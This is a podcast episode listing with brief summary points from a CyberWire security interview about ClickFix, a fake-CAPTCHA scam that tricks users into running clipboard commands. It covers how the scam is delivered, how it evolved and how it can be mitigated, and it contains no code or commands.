CyberWire Daily Browser attacks without downloads. [Research Saturday]
15 snips
Sep 20, 2025 Nati Tal, Head of Guardio Labs, dives into the alarming trend of ClickFix, a browser-based threat that exploits fake CAPTCHAs to execute malware without downloads. He reveals how this tactic evolved from malvertising to leveraging compromised sites, tricking users into executing harmful commands. Tal emphasizes the importance of behavioral protections over traditional signature-based defenses and discusses strategies for mitigation, including enhancing user awareness and disabling PowerShell. This innovative approach could change how we defend against online threats.
AI Snips
Chapters
Transcript
Episode notes
Captcha As A Command-Execution Vector
- ClickFix fakes a CAPTCHA to trick users into pasting and running clipboard PowerShell/shell commands.
- The attack executes malicious code in milliseconds while the user thinks they solved a CAPTCHA.
From Malvertising To Compromised WordPress
- Early ClickFix delivery used malvertising and pop-up tabs on gray-area streaming and download sites.
- Attackers later shifted to compromising legitimate WordPress sites to increase trust and conversions.
White-Hat Demos Fueled Malware Evolution
- Public red-team demos and GitHub forks accelerated adoption and variation of the scam.
- Security research examples served as templates attackers forked and evolved.